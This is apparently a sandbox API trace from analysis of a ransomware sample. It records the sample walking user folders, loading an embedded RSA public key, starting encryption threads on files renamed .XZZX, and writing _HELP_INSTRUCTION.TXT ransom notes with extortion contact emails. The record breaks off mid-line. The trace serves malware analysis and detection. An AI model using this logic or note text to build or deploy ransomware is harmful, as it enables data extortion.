[0179.877] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.877] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0179.877] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0179.877] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0179.877] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0179.877] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0179.878] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0179.878] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0179.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0179.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0179.878] SetErrorMode (uMode=0x1) returned 0x1 [0179.878] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0179.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0179.878] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0179.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0179.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0179.878] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0179.878] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0179.878] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.878] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.878] lstrcmpW (lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpString2="..") returned 1 [0179.878] lstrcmpW (lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpString2=".") returned 1 [0179.878] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0179.878] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="ntldr") returned 0x0 [0179.878] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="NTLDR") returned 0x0 [0179.879] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0179.879] StrStrW (lpFirst="4645E01C4F3CCEC4EA018E655354B30C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0179.879] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 44 [0179.879] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") [0179.879] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.879] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4645E01C4F3CCEC4EA018E655354B30C.XZZX" | out: lpString1="4645E01C4F3CCEC4EA018E655354B30C.XZZX") returned="4645E01C4F3CCEC4EA018E655354B30C.XZZX" [0179.879] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0179.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb28 [0179.879] Sleep (dwMilliseconds=0x96) [0180.029] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.030] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0180.030] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0180.030] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0180.030] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0180.030] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0180.030] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0180.030] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0180.030] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0180.030] SetErrorMode (uMode=0x1) returned 0x1 [0180.030] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT") returned 61 [0180.030] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0180.031] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0180.031] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xb2c) returned 0x0 [0180.031] RegQueryValueExW (in: hKey=0xb2c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437d0f8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x437d0f8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0180.031] RegCloseKey (hKey=0xb2c) returned 0x0 [0180.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0180.031] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0180.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb2c [0180.031] CloseHandle (hObject=0xb2c) returned 1 [0180.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0180.032] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0180.032] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0180.032] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0180.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.032] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.032] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.032] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.032] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0180.032] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0180.032] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0180.032] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0180.032] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0180.032] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0180.032] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0180.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0180.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0180.032] SetErrorMode (uMode=0x1) returned 0x1 [0180.033] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0180.033] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0180.033] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0180.033] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0180.033] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0180.033] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0180.033] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0180.033] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.033] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.033] lstrcmpW (lpString1="72A6C9432269CCE1A510518B2681B129.XZZX", lpString2="..") returned 1 [0180.033] lstrcmpW (lpString1="72A6C9432269CCE1A510518B2681B129.XZZX", lpString2=".") returned 1 [0180.033] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0180.033] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="ntldr") returned 0x0 [0180.033] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="NTLDR") returned 0x0 [0180.033] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0180.033] StrStrW (lpFirst="72A6C9432269CCE1A510518B2681B129.XZZX", lpSrch="ntdetect.com") returned 0x0 [0180.033] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 44 [0180.033] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") [0180.034] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0180.034] lstrcpyW (in: lpString1=0x17cf1c, lpString2="72A6C9432269CCE1A510518B2681B129.XZZX" | out: lpString1="72A6C9432269CCE1A510518B2681B129.XZZX") returned="72A6C9432269CCE1A510518B2681B129.XZZX" [0180.034] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0180.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb34 [0180.034] Sleep (dwMilliseconds=0x96) [0180.185] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.185] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.186] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.186] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.186] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.186] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0180.186] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0180.186] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0180.186] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0180.186] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0180.186] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0180.186] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0180.186] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0180.186] SetErrorMode (uMode=0x1) returned 0x1 [0180.186] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT") returned 61 [0180.187] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0180.190] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0180.190] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xb38) returned 0x0 [0180.190] RegQueryValueExW (in: hKey=0xb38, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437d328, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x437d328*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0180.190] RegCloseKey (hKey=0xb38) returned 0x0 [0180.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0180.190] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0180.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb38 [0180.190] CloseHandle (hObject=0xb38) returned 1 [0180.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0180.191] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="Favorites" [0180.191] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0180.191] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0180.191] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.191] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.191] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.191] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.191] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0180.191] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0180.191] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0180.191] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0180.191] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0180.191] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0180.191] SetErrorMode (uMode=0x1) returned 0x1 [0180.191] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0180.191] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.191] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0180.191] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0180.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0180.192] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="Links" [0180.192] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0180.192] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.192] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0180.192] lstrcmpW (lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpString2="..") returned 1 [0180.192] lstrcmpW (lpString1="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpString2=".") returned 1 [0180.192] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0180.192] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="ntldr") returned 0x0 [0180.192] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="NTLDR") returned 0x0 [0180.193] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0180.193] StrStrW (lpFirst="15DC3754190A8EA84ED7A99B1D2272F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0180.193] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 50 [0180.193] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") [0180.193] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- 